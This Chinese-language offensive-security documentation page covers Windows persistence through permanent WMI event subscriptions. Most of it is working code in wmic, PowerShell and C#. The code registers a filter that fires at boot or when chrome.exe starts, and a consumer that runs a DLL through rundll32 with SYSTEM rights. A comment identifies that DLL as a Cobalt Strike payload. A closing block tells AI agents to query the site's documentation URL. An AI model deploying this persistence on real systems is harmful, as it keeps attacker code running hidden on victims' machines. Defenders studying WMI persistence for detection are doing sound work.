# WMI事件

## WMI事件 <a href="#h1-wmi" id="h1-wmi"></a>

WMI事件，是特定对象的属性发生改变时发出的通知，其中包括增加、修改、删除三种类型。可以使用wmic命令来修改。

## 利用代码 <a href="#h1-u5229u7528u4ee3u7801" id="h1-u5229u7528u4ee3u7801"></a>

命令行：

```
#注册一个事件过滤器，该过滤器是开机2分钟到2分半钟，由于是永久WMI事件订阅，故需要管理员权限，最终获取到权限也是system权限
wmic /NAMESPACE:"\\root\subscription"PATH__EventFilterCREATE Name="TestEventFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 20 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=120 AND TargetInstance.SystemUpTime < 150"
#注册一个事件消费者，这里写入了要执行的命令，是用 rundll32 启动 cs 的 dll
wmic /NAMESPACE:"\\root\subscription"PATHCommandLineEventConsumer CREATE Name="TestConsumer2",ExecutablePath="C:\Windows\System32\cmd.exe",CommandLineTemplate=" /c rundll32 c:\Temp\qwqdanchun.dll"
#绑定事件 过滤器和事件消费者
wmic /NAMESPACE:"\\root\subscription"PATH__FilterToConsumerBindingCREATE Filter="__EventFilter.Name=\"TestEventFilter\"", Consumer="CommandLineEventConsumer.Name=\"TestConsumer2\""
```

Powershell：

```
$wmiParams = @{
  NameSpace = 'root\subscription'
}
# Creating a new event filter
$wmiParams.Class = '__EventFilter'
$wmiParams.Arguments = @{
  Name           = 'BugSecFilter'
  EventNamespace = 'root\CIMV2'
  QueryLanguage  = 'WQL'
  Query          = "select * from __InstanceCreationEvent  within 5 where targetInstance isa 'Win32_Process' and TargetInstance.Name = 'chrome.exe'"
}
$filterResult = Set-WmiInstance @wmiParams
# Creating a new consumer
$wmiParams.Class = 'CommandLineEventConsumer'
$wmiParams.Arguments = @{
  Name                = 'BugSecConsumer'
  CommandLineTemplate = "cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll"
}
$consumerResult = Set-WmiInstance @wmiParams
# Bind filter to consumer
$wmiParams.Class = '__FilterToConsumerBinding'
$wmiParams.Arguments = @{
  Filter   = $filterResult
  Consumer = $consumerResult
}
Set-WmiInstance @wmiParams
```

C#:

```csharp
using System;
using System.Text;
using System.Management;
namespace WMIPersistence
{
  class Program
  {
    static void Main(string[] args)
    {
      PersistWMI();
    }
    static void PersistWMI()
    {
      ManagementObject myEventFilter = null;
      ManagementObject myEventConsumer = null;
      ManagementObject myBinder = null;
      String CommandLine = @"cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll";
      String strQuery = @"SELECT * FROM __InstanceCreationEvent WITHIN 5 " +
                           "WHERE TargetInstance ISA \"Win32_Process\" " +
                           "AND TargetInstance.Name = \"chrome.exe\"";
      try
      {
        ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
        ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null);
        WqlEventQuery myEventQuery = new WqlEventQuery(strQuery);
        myEventFilter = wmiEventFilter.CreateInstance();
        myEventFilter["Name"] = "BugSecFilter";
        myEventFilter["Query"] = myEventQuery.QueryString;
        myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage;
        myEventFilter["EventNameSpace"] = @"\root\cimv2";
        myEventFilter.Put();
        myEventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null).CreateInstance();
        myEventConsumer["Name"] = "BugSecConsumer";
        myEventConsumer["CommandLineTemplate"] = CommandLine;
        myEventConsumer.Put();
        myBinder = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();
        myBinder["Filter"] = myEventFilter.Path.RelativePath;
        myBinder["Consumer"] = myEventConsumer.Path.RelativePath;
        myBinder.Put();
      }
      catch (Exception e)
      {
        Console.WriteLine(e);
      }
      Console.ReadKey();
    }
  }
}
```

参考文章：

{% embed url="<https://github.com/AxelPotato/WMI>" %}

{% embed url="<https://docs.microsoft.com/zh-cn/windows-hardware/drivers/kernel/introduction-to-wmi>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.qwqdanchun.com/main/persistence/wmi/wmi-event.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.